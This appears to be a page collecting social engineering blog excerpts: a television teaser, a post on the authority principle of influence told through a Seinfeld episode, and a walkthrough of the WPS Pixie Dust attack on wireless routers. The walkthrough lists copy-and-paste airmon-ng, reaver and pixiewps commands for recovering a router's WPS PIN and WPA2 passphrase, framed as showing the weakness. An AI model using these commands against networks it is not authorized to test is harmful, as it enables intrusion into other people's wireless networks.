Social Engineering Blogs

Changing Minds Blog September 26, 2015

The power of television and control of a country

Television is a surprisingly powerful form of control, especially in some countries.

The Influence People Blog September 21, 2015

Jerry Seinfeld: Following the Lead of an Expert

I’m a big Seinfeld fan. No matter how many times I’ve seen an episode I always laugh. I’ve watched reruns so many times over the past 25 years I feel like Jerry, George, Elaine and Kramer are personal friends. What I appreciate most is how the show portrays everyday situations in such a humorous light. An episode I watched recently went right to the heart of one of the principles of influence, so I felt compelled to write about it.

In this particular Seinfeld rerun Jerry bought a fancy, very expensive tennis racquet from Milosh, the owner of the sporting goods store associated with the tennis club Jerry belonged to. A short time later Jerry discovered Milosh was a terrible tennis player while playing at another club with Elaine. Apparently Milosh was so bad he wouldn’t play at his own club because he knew it would kill his reputation and sales. The following conversation ensued between Jerry and Elaine later at Jerry’s apartment:

Elaine – “So he was bad. What do you care?”

Jerry – “Elaine, I paid $200 for this racquet because he said it’s the only one he plays with. He could play just as well with a log.”

What sealed the deal for Jerry was the thought of a tennis pro – an expert – playing with the suggested racquet. He thought if it was good enough for the pro then of course he should play with it too because pros only use the very best equipment.

Jerry’s actions go to the heart of the principle of authority – we rely on those with superior knowledge, wisdom or expertise, when making decisions. And the advice of an expert is even more effective when someone isn’t sure what to do.

Jerry had been playing with a wooden racquet and had no idea there was a better option available until the pro told him so. Any newer racquet would have been an improvement but the more expensive racquet must be better because, after all, “you get what you pay for,” according to the old saying.

This happens quite often, especially when someone takes up a new sport. They buy lots of fancy, expensive equipment because that’s what the best athletes use. Unfortunately the novices could have saved a lot of hard earned cash by going with good, but less expensive equipment, until they got much better. The very best equipment makes a difference for the very best players because sometimes the difference between winning and losing is a fraction of a second, a single stroke, or inches.

Is expert advice worth listening to? Most of the time, yes, but just be leery when that advice might lead to very costly purchases that make very little difference in the end.

Brian Ahearn, CMCT®
Chief Influence Officer

influencePEOPLE
Helping You Learn to Hear “Yes”.

Subliminal Hacking Blog September 21, 2015

How To Crack WPS with Pixie Dust … Offline Attacking

In this post we are looking at how vulnerable WPS makes your Access Point. WiFi Protected Setup makes it nice and easy for you to connect to your wireless devices by using a simple pin number, instead of your hard to guess passphrase. The issue is that this means your secure 32 character passphrase is about as much use a chocolate fireguard, as instead of taking potentially years to crack, you can attack the pin number which only has 11,000 iterations and this can be cracked in hours (even with timeouts and other controls in place).

In this video we will show how a vulnerability in some of the chipsets of Wireless Access Points allows you to crack the WPS code in less than a second as well as revealing the WPA pin number. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.

The way this works is that the Enrollee Hashes (E-Hash1 / E-Hash2) are supposed to be secret hashes, but when they are disclosed we can use them along with the Enrolle and Registrar Public Keys, along with the E & R Nonces and the Auth Key to decipher the WPS PIN Key.

Just to provide some comparison, using the WPS PixieDust attack we got the PIN and then the WPA2 Passphrase in less than a second. Stealing the WPA2 Hash and attacking this directly with a single GPU the time estimated to crack based on knowing its Alpha Numeric with no special characters is 853,399 days, 2 hours and 44 minutes, so year WPS add some weakness to your hardened access point

Below is the code used during the above video, you can use this easily copy and paste with your own information.

iwconfig

airmon-ng start wlan1

airmon-ng check kill

airodump-ng wlan1mon –wps

reaver -i wlan1mon -c -b -vv

pixiewps -e -r -s -z -a -n

reaver -i wlan1mon -c -b -vv -K 1

If you are looking to do this on Ubuntu and not Kali, you will need the following packages (cheers Matt):

apt-get install install build-essential libnl-3-dev libnl-genl-3-dev

wget http://download.aircrack-ng.org/aircrack-ng.1.2-rc2.tar.gz

git clone https://github.com/t6x/reaver-wps-fork-t6x

git clone https://github.com/wiire/pixiewps

Finally, in the WPS column you need to be checking for one of the following to make sure the Access Point has WPS enabled, if it isnt its not supported on the device, or you have successfully disabled it. 1.0, LAB, PBC, NFC, PIN,